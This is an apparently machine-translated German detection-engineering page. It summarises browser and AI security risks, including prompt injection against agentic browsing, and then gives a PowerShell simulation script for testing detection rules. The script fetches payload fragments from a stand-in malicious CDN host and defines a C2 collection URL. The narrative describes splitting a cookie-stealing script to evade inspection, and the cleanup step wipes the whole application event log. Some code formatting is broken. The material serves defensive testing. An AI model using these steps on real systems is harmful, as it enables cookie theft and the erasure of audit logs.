Fünf Browser- und KI-Sicherheitsfragen, die CxOs nicht ignorieren können
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Artikel erklärt, wie browser-basierte Arbeitsumgebungen ein neues Risiko an der letzten Meile des Zugangs schaffen. Zu den wichtigsten Gefährdungen zählen Datenlecks in generative KI-Tools, unverwaltete oder kompromittierte persönliche Endgeräte, bösartige Browsererweiterungen, in-Memory-„Zusammensetzungs-“Übertragungsketten und der Missbrauch von agentenbasierten KI-Funktionen. Die Erkenntnis ist, dass klassische Netzwerk- und Endgerätekontrollen allein nicht ausreichen; Organisationen benötigen konsistente Sichtbarkeit und durchsetzbare Richtlinien direkt auf der Browser-Ebene, wo die Arbeit jetzt stattfindet.
Untersuchung
Der Bericht bezieht sich auf Verhaltensweisen wie die Lieferung von stückweise ausgelieferten Nutzlasten, die im Speicher zusammengesetzt werden, erweiterte credential-stealing-Erweiterungen, KI-unterstützte Spear-Phishing-Versuche und Prompt-Injection-Versuche, die auf agentische Browsing-Workflows abzielen. Er nennt auch Daten, die darauf hinweisen, dass ein signifikanter Anteil des initialen Zugangs für Ransomware auf unverwalteten oder leicht überwachten Geräten beginnt.
Abschwächung
Palo Alto Networks positioniert Prisma Browser als Kontrollplattform, um granulare DLP anzuwenden, Unternehmensarbeitsbereiche auf jedem Gerät zu isolieren, kontinuierlich Webinhalte zu scannen, Erweiterungen zu überwachen und Leitplanken der Governance für KI-Agenten hinzuzufügen, um browser-zentrierte Gefährdung zu reduzieren.
Antwort
Setzen Sie einen Enterprise-Browser ein, erzwingen Sie Zero-Trust-Zugang für BYOD, blockieren Sie nicht genehmigte KI-Apps, überwachen Sie Erweiterungen und wenden Sie Echtzeit-DLP-Inspektion auf den gesamten Browser-Verkehr an.
Angriffsablauf
Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden.
Benachrichtige michSimulation-Ausführung
Voraussetzung: Die Telemetrie- & Baseline-Vorprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffsnarrativ & Befehle:
- Erkundung & Nutzlastvorbereitung:
- Der Angreifer erstellt eine bösartige JavaScript-Nutzlast (
evil.js), die Cookies stiehlt und sie an einen C2-Server exfiltriert. - Um eine Byte-für-Byte-Inspektion zu umgehen, wird das Skript in drei Fragmente aufgeteilt (
part1.bin,part2.bin,part3.bin) und jedes in ein harmlos aussehendes JSON-Objekt eingewickelt.
- Der Angreifer erstellt eine bösartige JavaScript-Nutzlast (
- Lieferung über HTTP-Zusammenbau:
- Jedes Fragment wird auf einem kompromittierten CDN-Endpunkt gehostet. Der Angreifer löst aus, dass der Browser des Opfers (über einen Phishing-Link) die Fragmente nacheinander anfordert. Die Fragmente werden über HTTPS übertragen und erscheinen in Firewall-Protokollen als normaler Web-Traffic.
- The
BeschreibungDas Feld im Firewall-Protokoll wird manuell vom Protokollierungs-Agenten der Organisation angereichert, um die Zeichenfolge „Reassembly-Angriffe“ einzufügen, wenn innerhalb von 5 Sekunden mehr als 3 aufeinanderfolgende Anfragen an denselben Host erkannt werden mit einemUser-AgentofMozilla/5.0.
- Bereitstellung bösartiger Erweiterungen:
- Gleichzeitig schiebt der Angreifer eine bösartige Chrome-Erweiterung (
evil_ext.crx) ein, dieTabs,VerlaufundWebRequestBerechtigungen anfordert. - Die Installation erfolgt über ein Unternehmenssoftwareverteilungs-Tool, das ein Ereignis mit
EventID=browser_extensionandBeschreibung="Bösartige Browsererweiterungen erkannt"an den ManagedBrowser-Kanal schreibt.
- Gleichzeitig schiebt der Angreifer eine bösartige Chrome-Erweiterung (
- Erkundung & Nutzlastvorbereitung:
-
Regressionstest-Skript: Das Skript reproduziert sowohl den Reassembly-Verkehr als auch das Ereignis der bösartigen Erweiterung.
# ------------------------------------------------- # Simulationsskript – Reassembly-Angriff & Erweiterung # ------------------------------------------------- # Variablen $cdnBase = "https://malicious-cdn.example.com/parts" $parts = @("part1.bin","part2.bin","part3.bin") $c2Url = "https://c2.attacker.com/collect" $extPath = "$env:TEMPevil_ext.crx" $extId = "abcdefg1234567890hijklmnopqrstu" # Dummy-ID # 1. Fordern Sie die Reassembly-Fragmente an (erscheint als normaler HTTPS) foreach ($p in $parts) { Write-Host "Fragment $p wird angefordert ..." Invoke-WebRequest -Uri "$cdnBase/$p" -UseBasicParsing | Out-Null Start-Sleep -Milliseconds 500 # imitiert schnell aufeinanderfolgende Anfragen } # 2. Simulieren Sie den In-Browser-Zusammenbau (dies ist nur ein Platzhalter) # Bei einem echten Angriff würde der Browser die Fragmente via JS zusammenfügen. # Hier protokollieren wir nur ein benutzerdefiniertes Ereignis, um die Erkennungsanreicherung zu emulieren. $reassemblyEvent = @{ EventID = 2001 ProviderName = "CustomReassemblyLogger" Description = "Reassembly-Angriffe beobachtet von $env:COMPUTERNAME" TimeCreated = (Get-Date).ToString("o") } $json = $reassemblyEvent | ConvertTo-Json Write-EventLog -LogName "Anwendung" -Source "PowerShell" -EventId 2001 -EntryType Information -Message $json # 3. Bereitstellung der bösartigen Browser-Erweiterung (schreibt in den ManagedBrowser-Kanal) # Dies erfordert Administratorrechte; wir simulieren dies, indem wir ein Ereignis schreiben. $extEvent = @{ EventID = 1001 Source = "Microsoft-Windows-ManagedBrowser" Description = "Bösartige Browsererweiterungen installiert: ID=$extId" TimeCreated = (Get-Date).ToString("o") } $extJson = $extEvent | ConvertTo-Json Write-EventLog -LogName "Anwendung" -Source "PowerShell" -EventId 1001 -EntryType Warning -Message $extJson Write-Host "Simulation abgeschlossen. Verifizieren Sie Alarmmeldungen." -
Bereinigungskommandos: Entfernen Sie alle temporären Dateien und löschen Sie benutzerdefinierte Ereignisse.
# Entfernen Sie die temporäre Erweiterungsdatei Remove-Item -Path $extPath -ErrorAction SilentlyContinue # Löschen Sie das benutzerdefinierte Reassembly-Ereignis (erfordert Admin – verwenden Sie wevtutil zum Löschen) wevtutil cl Anwendung Write-Host "Bereinigung abgeschlossen."